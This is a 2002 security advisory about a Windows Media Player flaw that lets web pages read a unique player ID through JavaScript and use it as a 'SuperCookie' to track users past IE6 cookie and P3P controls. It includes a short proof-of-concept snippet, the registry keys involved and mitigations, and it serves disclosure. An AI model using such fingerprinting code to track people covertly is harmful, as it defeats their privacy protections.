http://www.computerbytesman.com/privacy/supercookie.htm
Internet Explorer SuperCookies bypass P3P and cookie controls Richard M. Smith ([EMAIL PROTECTED]) January 16, 2002 Introduction There is a significant privacy problem with Internet Explorer because of a design flaw in the Windows Media Player (WMP). Using simple Javascript code on a Web page, a Web site can grab the unique ID number of the Windows Media Player belonging to a Web site visitor. This ID number can then be used just like a cookie by Web sites to track a user's travels around the Web. However this ID number becomes a SuperCookie because it can be used by Web sites to bypass all of the new privacy and P3P protections that Microsoft has added to Internet Explorer 6 (IE6). IE6 ships today with all Windows XP systems. SuperCookies also work in all previous versions of Internet Explorer with all older versions of Windows. Some of the other features of SuperCookies include: All Web sites get the same ID number so they can easily exchange information about a user much like third-party cookies are used today by ad networks and Internet marketing companies. Even if someone is using a cookie blocker add-in, SuperCookies will still work. If a user has deleted cookies from his or her computer to stop tracking, a Web site can restore an old cookie value from this ID number. Once the cookie value has been restored, new tracking data can be combined with tracking data that was previously collected by the Web site. To block SuperCookies requires changing an obscure option in WMP which is barely documented. Demo Page I've set up a simple demo page that shows the issue: http://www.computerbytesman.com/privacy/supercookiedemo.htm Technical Details When the Windows Media Player is installed on a computer, a unique ID number in the form of a GUID is assigned to the player. This ID number is stored in the Windows registry. The ActiveX interface to the Windows Media Player allows any JavaScript Program to retrieve the ID number using the property "ClientID". The following example HTML and JavaScript code illustrates how easy it is to retrieve the ID number: <OBJECT classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95" ID=WMP WIDTH=1 HEIGHT=1> </OBJECT> <script> alert(document.WMP.ClientID); </script> Once the ID number is available to a JavaScript program, it can be sent back to a Web site either by appending it to the URL of a Web bug or storing it in regular Web browser cookie. The actual WMP player ID number is stored in the Windows registry in these keys: HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General string value "UniqueID" or HKEY_USERS\<user>\Software\Microsoft\Windows Media\WMSDK\General string value "UniqueID" If one of these keys is manually changed using REGEDIT, the demo page will show the new ID number. However, leaving the keys changed may break the Digital Rights Management (DRM) features of WMP. In newer versions of WMP, there is an option on the "Tools | Options" Menu called "Allow Internet sites to uniquely identify your player". If this option is manually turned off, SuperCookies will also be disabled because Internet Explorer will generate a new player ID number each IE session. SuperCookies also work in Netscape Navigator if the WMP plugin has been installed. Recommendations for Microsoft I originally notified Microsoft of this problem in March 2001. At that time there was no method of turning off SuperCookies except to uninstall WMP or disable JavaScript. Neither solution was very useful. In response to my message to Microsoft, they updated WMP to provide per-session player ID numbers when the WMP option "Allow Internet sites to uniquely identify your player". This update is described in this Microsoft security bulletin: http://www.microsoft.com/technet/security/bulletin/MS01-029.asp However, I do not believe that this is a workable solution for the majority of Windows users. Asking them to change an obscure WMP setting to fix a privacy leak in Internet Explorer is not a good policy. Instead, I believe, that the ClientID property in the WMP ActiveX should be permanently disabled by having it return an ID number of zero for all players. Acknowledgements Thanks to the many folks on the BugTraq and NTBugTraq mailing lists for helping sort out all of the technical details of this issue. Russ Cooper, moderator of NTBugTraq, was particular helpful. Andrew Schulman and David Martin also provided very useful feedback on the initial versions of this advisory. Links Microsoft Security Bulletin on a Windows Media Player patch NTBugTraq: Windows Media Player ID update CNET: Privacy flaw continues to dig IE hole MSNBC: Privacy issue hits Windows Media The Register: Windows Media Player must be patched to fix IE ] Newsbytes: Windows Media Player 'Super Cookies' Could Help Track Users
